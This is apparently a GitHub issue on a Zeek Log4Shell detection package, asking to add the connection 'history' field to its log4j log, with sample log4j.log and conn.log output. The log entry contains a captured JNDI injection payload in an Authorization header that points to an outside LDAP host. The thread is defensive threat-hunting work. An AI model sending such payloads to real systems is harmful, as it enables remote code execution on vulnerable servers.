cve-2021-44228
Add history field to the notice and/or log4j
Would it be possible to add the history field to the log4j or notice log? This can be useful when threat hunting, to be able to rule out an attempt had it been reset or if it timed out, for example. Currently a customer would have to pivot on the UID to the conn log and pull the information.
So I went ahead and added this to see what it would look like. Notice that the history value at the time the log4j log entry is created is different. I don't know much about the history field, but I suspect it might not be useful if it isn't "complete". I'm guessing the uid union approach with conn is The Right Way™ to do this, but let me know if the incomplete history is still useful.
~/code/cve-2021-44228 add-history*
¡ cat log4j.log
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path log4j
#open 2021-12-16-17-19-05
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value history
#types time string string string string string string string bool string string bool bool string
1639350256.733555 CEX3Ta1xTltBcGU5rg / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T ShAD
#close 2021-12-16-17-19-05
~/code/cve-2021-44228 add-history*
¡ cat conn.log
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path conn
#open 2021-12-16-17-19-05
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes conn_state local_orig local_resp missed_bytes history orig_pkts orig_ip_bytes resp_pkts resp_ip_bytes tunnel_parents
#types time string addr port addr port enum string interval count count string bool bool count string count count count count set[string]
1639350256.509078 CEX3Ta1xTltBcGU5rg 154.65.28.250 57932 172.16.4.58 80 tcp http 0.224914 142 802 SF - - 0 ShADFadfR 6 438 4 1018 -
#close 2021-12-16-17-19-05